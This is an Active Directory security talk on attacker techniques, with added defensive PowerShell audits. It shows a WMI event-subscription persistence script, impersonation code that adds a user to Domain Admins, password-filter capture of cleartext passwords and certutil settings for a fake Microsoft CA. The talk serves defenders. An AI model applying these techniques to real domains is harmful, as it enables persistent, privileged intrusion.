
What would a real hacker do to your AD | Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services


1 What would a real hacker do to your AD
GOPAS: info@gopas.cz | www.gopas.cz | www.facebook.com/P.S.GOPAS
Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker | ondrej@sevecek.com | www.sevecek.com

2 Intro
- What happens when they take one of your DCs?
- You are doomed
  - you must reinstall the whole forest from scratch
  - you may be able to restore the whole forest from the last clean backup, provided you are sure the intrusion will not happen again

3 Why do I show these things
- Secure machines physically
- Do not use domain admin credentials on insecure machines
- Separate administrative accounts
- Never use admin accounts to access services
- Stress strong passwords, or rather use smart cards

4 Agenda
- Physical DC security
- Password filters
- Hidden accounts
- Hidden scheduled tasks
- Forest is a security boundary
- Exploiting Kerberos delegation
- Logon without passwords

5 Physical DC security
- Having physical access means you have full power over data, settings and binaries
  - partially substitute physical security with BitLocker and TPM
  - use RODCs at insecure locations
- Hardware keyloggers
- Reboot and offline modifications

6 Password filters
- Password change/reset after an attack means nothing: a filter DLL registered here receives every new password in clear text
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages = MULTI_SZ
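The registry value above is the place a defender has to watch. The following PowerShell is an added example, not part of the presentation: it lists the registered LSA notification packages on a machine, checks that each DLL exists in System32 and is signed, and flags names outside a baseline. The baseline list is an assumption about a default domain controller build; record your own values and substitute them.

```powershell
# Added example, not from the presentation: report LSA notification packages
# and flag any that are outside an expected baseline. Entries are DLL base
# names that LSASS loads from System32 at boot.
function Get-NotificationPackageReport {
    param(
        # Assumption: names normally present on a domain controller.
        # Replace with the values recorded from your own clean build.
        [string[]]$Expected = @('scecli', 'rassfm')
    )
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $value = Get-ItemProperty -Path $key -Name 'Notification Packages'
    foreach ($pkg in @($value.'Notification Packages')) {
        if ([string]::IsNullOrWhiteSpace($pkg)) { continue }
        $dll = Join-Path $env:SystemRoot "System32\$pkg.dll"
        $signature = if (Test-Path $dll) {
            (Get-AuthenticodeSignature -FilePath $dll).Status
        } else { 'FileMissing' }
        [PSCustomObject]@{
            Package   = $pkg
            Baseline  = if ($Expected -contains $pkg.ToLower()) { 'expected' } else { 'REVIEW' }
            Path      = $dll
            Signature = $signature
        }
    }
}

# Run locally, or against every DC over WinRM (requires the ActiveDirectory module):
Get-NotificationPackageReport | Format-Table -AutoSize
# Get-ADDomainController -Filter * | ForEach-Object {
#     Invoke-Command -ComputerName $_.HostName -ScriptBlock ${function:Get-NotificationPackageReport}
# }
```

Anything marked REVIEW, unsigned, or missing on disk deserves a look. For continuous detection, Security event 4614 ("A notification package has been loaded by the Security Account Manager") is written at boot for each package, so a baseline of those events per DC shows a new package the first time it loads.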

7 Hidden accounts
- You are never able to do a 100% security audit after an attack
- Not even Domain Admins can see everything

8 Hidden scheduled tasks
- You are never able to do a 100% security audit after an attack
- Not even the prominent audit tools know everything
- root\subscription, ActiveScriptEventConsumer
    Name =
    ScriptEngine = VBScript
    ScriptText =
      set fso = CreateObject("Scripting.FileSystemObject")
      fileName = "c:\showit" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt"
      set newFile = fso.CreateTextFile(fileName)
      newFile.WriteLine("I will be here for ever!")
      newFile.Close()

9 Hidden scheduled tasks
- You are never able to do a 100% security audit after an attack
- ... continuing ...
- __EventFilter
    Name =
    QueryLanguage = WQL
    EventNamespace = root\cimv2
    Query = SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9
  - Win32_LocalTime properties usable in the query: Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth
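A consumer and a filter like the pair on these two slides only fire once a __FilterToConsumerBinding ties them together, so the bindings are what an audit should enumerate. The following PowerShell is an added example, not from the presentation: it walks root\subscription and prints every binding with its filter's WQL query and its consumer's payload, which is how a persisted VBScript or command line like the one above becomes visible.

```powershell
# Added example, not from the presentation: enumerate permanent WMI event
# subscriptions in root\subscription and resolve each binding to its filter
# query and consumer payload.
function Get-WmiSubscriptionReport {
    param([string]$ComputerName = $env:COMPUTERNAME)
    $cim = @{ Namespace = 'root\subscription'; ComputerName = $ComputerName }
    $filters   = @(Get-CimInstance @cim -ClassName __EventFilter)
    $consumers = @(Get-CimInstance @cim -ClassName __EventConsumer)   # returns derived consumers too
    $bindings  = @(Get-CimInstance @cim -ClassName __FilterToConsumerBinding)

    # Reference properties come back as CIM instances from Get-CimInstance, but as
    # path strings like __EventFilter.Name="x" from older WMI tooling; handle both.
    function Get-RefName($ref) {
        if ($ref -is [string]) { return ($ref -replace '^.*Name="([^"]*)".*$', '$1') }
        return $ref.Name
    }

    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        $type = if ($c) { $c.CimClass.CimClassName } else { 'missing' }
        $payload = switch ($type) {
            'ActiveScriptEventConsumer' { $c.ScriptText }          # inline script, as on the slide
            'CommandLineEventConsumer'  { $c.CommandLineTemplate } # command to run
            default { '' }
        }
        [PSCustomObject]@{
            Computer     = $ComputerName
            Filter       = $fName
            Query        = if ($f) { $f.Query } else { 'missing' }
            ConsumerType = $type
            Consumer     = $cName
            Payload      = $payload
        }
    }
}

Get-WmiSubscriptionReport | Format-List
```

A stock Windows install carries one legitimate binding (the "SCM Event Log Filter" to an NTEventLogEventConsumer); anything else, in particular any ActiveScriptEventConsumer or CommandLineEventConsumer, should be explained or removed with Remove-CimInstance. For ongoing detection, the Microsoft-Windows-WMI-Activity/Operational log records new permanent subscriptions (event 5861) and Sysmon emits events 19, 20 and 21 for filter, consumer and binding creation.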

10 Forest is a security boundary
- Domain Admins from any domain of a forest are Domain Admins in every other domain as well
- Site level GPOs
- No SID filtering inside a forest
- NTAuth CAs
- Stealing KDC passwords (krbtgt account)
- ...

11 Subdomain scenario (diagram): forest root gopas.virtual with child domains CZ.gopas.virtual and DE.gopas.virtual

12 Kerberos delegation with protocol transition
- Password is not the only means of logging on to network services
  - no credentials necessary at all
- Trust this computer to specified services only, with "Any authentication protocol"

13 Kerberos delegation (diagram): Client (Kamil) -> App Server -> DB, LDAP, FS

14 Kerberos delegation with protocol transition (diagram): App Server, without any client logon by Kamil, -> DB, LDAP, FS

15 Delegation with PowerShell
    # Adjust-Privilege is the presenter's own helper, not a built-in cmdlet
    Adjust-Privilege 7 $true
    $winId = New-Object System.Security.Principal.WindowsIdentity 'kamil@gopas.cz'
    [Security.Principal.WindowsIdentity]::GetCurrent()
    $winId.Impersonate()
    [Security.Principal.WindowsIdentity]::GetCurrent()
    $domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual'
    $domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,DC=gopas,DC=virtual')
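The demonstration on slides 12 to 15 works only because some account in the forest is allowed to delegate with protocol transition. The following PowerShell is an added example, not from the presentation: it queries AD for every user or computer with unconstrained delegation, with protocol transition ("Any authentication protocol"), or with a constrained delegation target list, so the accounts that can impersonate arbitrary users like kamil are known in advance. It assumes the ActiveDirectory module is available; the userAccountControl bit values are the documented TRUSTED_FOR_DELEGATION and TRUSTED_TO_AUTH_FOR_DELEGATION flags.

```powershell
# Added example, not from the presentation: audit Kerberos delegation settings.
Import-Module ActiveDirectory

function Get-DelegationReport {
    $TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
    $TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition
    $NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"

    # LDAP bitwise-AND matching rule on userAccountControl, plus any explicit target list.
    $filter = "(|(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION)" +
              "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_TO_AUTH_FOR_DELEGATION)" +
              "(msDS-AllowedToDelegateTo=*))"
    $props = 'userAccountControl', 'msDS-AllowedToDelegateTo', 'servicePrincipalName'

    Get-ADObject -LDAPFilter $filter -Properties $props | ForEach-Object {
        $uac = [int]$_.userAccountControl
        [PSCustomObject]@{
            Name                = $_.Name
            Class               = $_.ObjectClass
            Unconstrained       = [bool]($uac -band $TRUSTED_FOR_DELEGATION)
            ProtocolTransition  = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            AllowedToDelegateTo = (@($_.'msDS-AllowedToDelegateTo') -join '; ')
        }
    }
}

# Protocol transition is the setting the slides exploit; list those first.
Get-DelegationReport |
    Sort-Object ProtocolTransition, Unconstrained -Descending |
    Format-Table -AutoSize
```

Domain controllers legitimately appear with Unconstrained set, so the interesting rows are member servers and service accounts. The mitigation side of the same flags: mark privileged accounts with NOT_DELEGATED (Set-ADUser -AccountNotDelegated $true) or put them in the Protected Users group, and keep protocol transition off unless the application really needs it.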

16 Smart card logon
- Password is not the only means of logging on to computers
- NTAuth CA
  - forest-wide trust
  - does not need to consult AD or touch LDAP at all
- Notes:
    ldap:///CN=GOPAS%20Root%20Online%20CA,CN=DC1,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=gopas,DC=virtual?certificateRevocationList?base?objectClass=cRLDistributionPoint

17 Fake Microsoft CA
- Something must always be trusted
- Root CA: CN=Microsoft Root Authority, OU=Microsoft Corporation, OU=Copyright (c) 1997 Microsoft Corp.
- Code signing cert: CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

18 Fake Microsoft CA
- Longer validity for issued certificates
    CERTUTIL -setreg CA\ValidityPeriodUnits 5
- No certificate template name extension
    CERTUTIL -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.7
- No CRL paths in issued certificates
    certutil -setreg DBFlags +DBFLAGS_ENABLEVOLATILEREQUESTS
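Slides 16 to 18 turn on the same fact: whatever sits in the machine Root store or in the forest NTAuth store is trusted for code and for smart card logon without further checks. The following PowerShell is an added example, not from the presentation: it reads the local Root store and the NTAuthCertificates object in the Configuration partition (the same partition the CDP URL on slide 16 points into) and reports every certificate whose thumbprint is not in a known-good baseline, marking Microsoft-named ones separately. The baseline thumbprint is a placeholder; fill it from a clean forest.

```powershell
# Added example, not from the presentation: find CA certificates that are
# trusted for logon or code signing but are not in a known-good baseline.
function Get-NTAuthCertificates {
    $rootDse  = [ADSI]'LDAP://RootDSE'
    $configNC = $rootDse.configurationNamingContext.Value
    $ntauth   = [ADSI]"LDAP://CN=NTAuthCertificates,CN=Public Key Services,CN=Services,$configNC"
    # cACertificate is multi-valued; each value is a DER-encoded certificate.
    foreach ($raw in $ntauth.Properties['cACertificate']) {
        [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([byte[]]$raw)
    }
}

function Find-UnexpectedCAs {
    param(
        # PLACEHOLDER: thumbprints of the CAs you deliberately trust, taken from a clean forest.
        [string[]]$Baseline = @('0000000000000000000000000000000000000000')
    )
    $stores = @(
        @{ Store = 'LocalMachine\Root'; Certs = @(Get-ChildItem Cert:\LocalMachine\Root) }
        @{ Store = 'AD NTAuth';         Certs = @(Get-NTAuthCertificates) }
    )
    foreach ($s in $stores) {
        foreach ($c in $s.Certs) {
            if ($Baseline -contains $c.Thumbprint) { continue }
            # A Microsoft-named subject that is not in the baseline is exactly the
            # pattern on slide 17, so it is flagged more loudly.
            $flag = if ($c.Subject -match 'Microsoft') { 'UNKNOWN Microsoft-named CA' } else { 'not in baseline' }
            [PSCustomObject]@{
                Store      = $s.Store
                Subject    = $c.Subject
                Issuer     = $c.Issuer
                Thumbprint = $c.Thumbprint
                NotBefore  = $c.NotBefore
                Flag       = $flag
            }
        }
    }
}

# Newest certificates first: a freshly planted root shows up at the top.
Find-UnexpectedCAs | Sort-Object NotBefore -Descending | Format-Table -AutoSize
```

The NTAuth list should be short, one entry per enterprise CA that issues logon certificates, so every unexplained row there matters more than one in the Root store. The same AD object can be viewed interactively with certutil -viewstore -enterprise NTAuth, and removed entries are published back with certutil -dspublish.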

19 GOODBYE
GOPAS: info@gopas.cz | www.gopas.cz | www.facebook.com/P.S.GOPAS
See you at the courses of the GOPAS, a.s. computer school:
- GOC171 - Active Directory Troubleshooting
- GOC172 - Kerberos Troubleshooting
- GOC173 - Enterprise PKI Deployment
- GOC175 - Administering Security

